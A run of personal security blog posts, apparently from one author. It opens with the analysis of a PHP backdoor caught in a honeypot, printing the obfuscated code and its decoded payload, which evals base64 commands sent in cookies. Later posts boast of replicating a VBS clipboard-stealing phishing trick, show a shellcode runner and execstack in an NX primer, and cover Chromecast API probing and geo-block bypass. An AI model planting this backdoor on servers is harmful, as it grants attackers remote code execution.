Iloveyou PHP Backdoor

One of my botnet eh honeynet managed to caught up this nifty PHP script.

$sdfv="oofJGEpofPjMpeyRrPSdvofdmVof5b3UnofO2VjaG8gJzwnLiRrLic+JztldmFsKGJhc2U2NF9kZWNvZGUocHJlZ19";
$kisg = str_replace("ar","","sartarrar_rarearparlaracare");
$ltjz="yZofXBsYWNlKGFycmofF5KCcvW15cdz1cc10vJywnL1xzLycpLCBhofcnJofheSofgnJywnKycpL";
$ynsx="CBqb2luKGFycmF5X3NsaWNoflKCRofhLofCRjKCRhKS0zKSofkpKSkof7ZWNobyAnofPC8nLiRrLiofc+Jztof9";
$dkhg="JGofMof9J2NvofdW5of0JzskYT0kX0NPT0tofJRTtpZihyZXNldCgkYSk9ofPSdpbCcgJiYgJGMof";
$gsqn = $kisg("dk", "", "bdkadksdkedk64dk_dkddkecdkode");
$zuzt = $kisg("z","","zczrzezatze_zfzuznzcztzion");
$lyyq = $zuzt('', $gsqn($kisg("of", "", $dkhg.$sdfv.$ltjz.$ynsx))); $lyyq();?>

It's pretty much straight forward just by having a glance on it.

$kisg  = is actually string_replace
$gsqn =  base64_decode
$zuzt  = create_function

Cleaning this bad ware stuff  will give us

$lyyq = create_function(base64_decode("JGM9J2NvdW50JzskYT0kX0NPT0tJRTtpZihyZXNldCgkYSk9PSdpbCcgJiYgJGMoJGEpPjMpeyRrPSdvdmV5b3UnO2VjaG8gJzwnLiRrLic+JztldmFsKGJhc2U2NF9kZWNvZGUocHJlZ19yZXBsYWNlKGFycmF5KCcvW15cdz1cc10vJywnL1xzLycpLCBhcnJheSgnJywnKycpLCBqb2luKGFycmF5X3NsaWNlKCRhLCRjKCRhKS0zKSkpKSk7ZWNobyAnPC8nLiRrLic+Jzt9"));

Final Output:

$lyyq = create_function($c='count';$a=$_COOKIE;if(reset($a)=='il' && $c($a)>3){$k='oveyou';echo '<'.$k.'>';eval(base64_decode(preg_replace(array('/[^\w=\s]/','/\s/'), array('','+'), join(array_slice($a,$c($a)-3)))));echo '</'.$k.'>';})

Conclusion? The author of this backdoor must be romantic..

Replicating Malware Function For Fun and Profits!!!!

At Scan Assoc, we are allowed to play and be creative with our viruses/malware to the max without any useless restraining policy...
If you read this post  and see the video below:


U know it's fun
Basicly it's using VBS scripting to copy clipboard...

I`ve replicated similliar technique also using VBS Scripting and bat script as a POC..
It's very innovative attack for Phishing....

Source code is in the Video..
Dis is just  a POC,  there's a way to bypass latest IE security clipboard warning!!!

A simple explanation about NX/Pax works.

This is nothing more then just to recap how NX/PAX  works why it's important for us to understand for beginners on exploitation, writing CTF flags :p , and other interesting people paper.

Below is a simplest code on a bad example on how to execute a shellcode.

unsigned char code[] = "\xcc";
int main(int argc, char **argv)
{
  int (*func)();
  func = (int (*)()) code;
  (int)(*func)();
}

Explanation:

1. We declare a pointer called func*

2. Func are pointed out to the location of memory code.

3. Execute watever being pointed by func() which is to say watever code resides in code.

Try compile and run:

gcc example1.c -o example ; ./example
Segmentation fault

Why? To understand this problem . Modern compilers by default will enfoce a NX bit on the stack region of the process. Any "local  variable" that we declared will be loaded in the stack region of the memory. And what does it mean to us ? To generalize our understanding , we know a region of memory in a computer can have 3 propeties:-

1. Read ; we can read and have access to the memory

2. Write: We ca write data to the particular region.

3. Execute: The code in that particular region can be executed.

cat /proc/3976/maps 
08048000-08049000 r-xp 00000000 08:01 1447191    /root/bypassav/example
08049000-0804a000 rw-p 00000000 08:01 1447191    /root/bypassav/example
b7e62000-b7e63000 rw-p 00000000 00:00 0 
b7e63000-b7fbf000 r-xp 00000000 08:01 1311258    /lib/i386-linux-gnu/i686/cmov/libc-2.13.so
b7fbf000-b7fc0000 ---p 0015c000 08:01 1311258    /lib/i386-linux-gnu/i686/cmov/libc-2.13.so
b7fc0000-b7fc2000 r--p 0015c000 08:01 1311258    /lib/i386-linux-gnu/i686/cmov/libc-2.13.so
b7fc2000-b7fc3000 rw-p 0015e000 08:01 1311258    /lib/i386-linux-gnu/i686/cmov/libc-2.13.so
b7fc3000-b7fc6000 rw-p 00000000 00:00 0 
b7fdf000-b7fe1000 rw-p 00000000 00:00 0 
b7fe1000-b7fe2000 r-xp 00000000 00:00 0          [vdso]
b7fe2000-b7ffe000 r-xp 00000000 08:01 1311294    /lib/i386-linux-gnu/ld-2.13.so
b7ffe000-b7fff000 r--p 0001b000 08:01 1311294    /lib/i386-linux-gnu/ld-2.13.so
b7fff000-b8000000 rw-p 0001c000 08:01 1311294    /lib/i386-linux-gnu/ld-2.13.so
bffdf000-c0000000 rw-p 00000000 00:00 0          [stack]

As u can see right now the stack region is mark as read-write ..... no x  means dat code in that region couldn`t be executed..

Now that we understand the stack region is protected, attacker evolves their attack into ROP or ret2/wateverlib  style programming. But that's beyond the scope of this post.  Having said that it's still possible to make your code executed by using mmap trick .  To make everyone happy here i cheat a litte using execstack just to see the difference..

gcc example1.c -o example ; execstack -s example; ./example 
Trace/breakpoint trap


cat /proc/4125/maps
08048000-08049000 r-xp 00000000 08:01 1447203    /root/bypassav/example
08049000-0804a000 rwxp 00000000 08:01 1447203    /root/bypassav/example
b7e62000-b7e63000 rwxp 00000000 00:00 0 
b7e63000-b7fbf000 r-xp 00000000 08:01 1311258    /lib/i386-linux-gnu/i686/cmov/libc-2.13.so
b7fbf000-b7fc0000 ---p 0015c000 08:01 1311258    /lib/i386-linux-gnu/i686/cmov/libc-2.13.so
b7fc0000-b7fc2000 r-xp 0015c000 08:01 1311258    /lib/i386-linux-gnu/i686/cmov/libc-2.13.so
b7fc2000-b7fc3000 rwxp 0015e000 08:01 1311258    /lib/i386-linux-gnu/i686/cmov/libc-2.13.so
b7fc3000-b7fc6000 rwxp 00000000 00:00 0 
b7fdf000-b7fe1000 rwxp 00000000 00:00 0 
b7fe1000-b7fe2000 r-xp 00000000 00:00 0          [vdso]
b7fe2000-b7ffe000 r-xp 00000000 08:01 1311294    /lib/i386-linux-gnu/ld-2.13.so
b7ffe000-b7fff000 r-xp 0001b000 08:01 1311294    /lib/i386-linux-gnu/ld-2.13.so
b7fff000-b8000000 rwxp 0001c000 08:01 1311294    /lib/i386-linux-gnu/ld-2.13.so
bffdf000-c0000000 rwxp 00000000 00:00 0          [stack]

Oh Hitb 2013 Kul starts tomorrow.. See you there soon!

bat script setting your notebook as a wireless . AP

Captive portal/Layer 2 isolation is a no no for Chromecast.. So I`m in Kelate right now,   Here's a quick bat script on setting your Windows 7 as an AP.. Run as administrator of course.

ap.bat

ECHO OFF

netsh wlan set hostednetwork mode=allow
netsh wlan set hostednetwork ssid=PUTYOUROWNSSID key=buhpasswordsendiri keyUsage=persistent
netsh wlan start hostednetwork

Use ICS with your No4G, or watever.. More infos:

http://msdn.microsoft.com/en-us/library/dd815243%28VS.85%29.aspx

Chromecast Experience in .MY Part 3

Okay part 3... It's pretty short and simple.. They say when u managed to produce a UML. The program is already completed :p

Chromecast Experience in .MY Part 2.

"Check out my new Iphone, It's using a 64 bit ARM. Not sure what it does but cool"
"My latest Samsung is using triple core processor. It's fast."

Unless  you have direct benefits from using such devices with that features, you are nothing more then just a mere human being consumed by the homogenization  of modernity.

This is the second part of Chromecast Experience. How does Chromecast work?
From Chromecast Developer Guide they have make a beautiful picture out of it.

So how does Casting works? When you first boot in your Chromecast, A Web Services would run and listen at port 8008. From a Blackbox point of view it's probably a heavy modifcation of node.js . Most likely with RESTful implementation.  of Web API. Owh it's using the DIAL .

So how does it works? Let's run our sniffer. Many people would prefer tcpdump or wireshark. But hey Windows does it charmed with Microsoft Network Monitor. Coolest thing bout this tool is you can filter it by apps in this case we filter chrome.

Each time we issue a cast  we actually "dial for it". When casting to a youtube application. We will send  GET Request to /app/YouTube

And the information that we will retrive is in a form of an XML Format hinting the DIAL implementation in chromecast.

From the DIAL developers guide

The rules of Dial Service..

1. First we send the a dial request for the Application(Youtube, Netflix)

2. Dial Server response with Okay

3. Then We Post the Application URL  in json format . It's actually a URL Forwarding technique.

4. Dial Server response . (Chromecast will launch it's Request via GET/POST to netflix or youtube).

At any application launch. The Apps can be kill (Netflix or Youtube) by issuing a HTTP DELETE.

Common HTTP Request can be found in the DIAL Developer Manual. Fiqueet.com have list down common Request that you can do with curl example.

get device information xml:
curl http://x.x.x.x:8008/ssdp/device-desc.xml

get detailed device information json:
curl http:///x.x.x.x:8008/setup/eureka_info?options=detail

scan for available wifi:
curl http:///x.x.x.x:8008/setup/scan_results

get supported time zones:
curl http:///x.x.x.x:8008/setup/supported_timezones

get info about current app:
curl -H “Content-Type: application/json” http:///x.x.x.x:8008/apps/YouTube -X GET

Which get back to us.. How does the video were streamed to us? Here is an incorrect pseudo-diagram but sufficient enough.

By now you should have at least an idea how to bypass it. If not you can wait for Part 3.

Chromecast Experience in .MY Part 1.

Living is not that easy these days. The cost of living have increased to a point where a mere average salary guy like me have a little bit trouble coping with my current life.  Yeap I admit I do have some sort of financial difficulty a bit . But Alhamdulilah I am bless with good  families and friends who are willing to help me in surviving the capitalistic nature of today's modernity.  

Nonetheless, the difficulty in one life shouldn`t be a burden to the soul in the quest of acquiring new knowledge.

Few months back down the road google have release the Chromecast . " A device that change makes your Smart TV Smarter"..

It cost us 35 bucks + 6 dollar shipping. Thanks to a friend of mine, Amir Shahir who bought it for me kindly.
Ifixit  had teardown for us. You can look on their website to see the inside of Chromecast.

To powered up the device is straight forward. Simply plug into your HDMI port  , and USB for power and it will boot on.

On my Sharp TV

Yeah terbalik dunno why.

Anyway the whole bunch of the Chromecast is actually a custom light webbrowser with HTML5 + Jscript + CSS Support. You can cast your content over WebRTC (since WebRTC support peer connect) or forward certain streaming sites request such as Youtube and Netflix (at this moment)..

Unfortunely we're living outside of the States. So surfing a Netflix is going to be a bit of problem.. Viewing geo-locked content is not a problem for PC users since a lot of proxies, VPN, can be used to bypass the protection.

That's not the situation with chromecast. This pricy small stuff is a bad-ass. You couldn`t rigged with it at all. The DNS Resolver is hardcoded in the device itself. One could root the device with previous firmware . But Google is also playing evil by updating the devices firmware without notifying the user, same goes to Google Chrome..

Solutions?

If you cannot customize/root the device. Then you make the device program behave like it was rooted. So for the past 48 hours , I've been testing analysing the chromecast traffic and studying the arts of bypassing of an unbypass devices..Hey presto the solutions is simple , i managed to sketch it on a nice A4..

Continue soon...
Just in case nobody belives me it's possible even using a cap telekom DIR-615...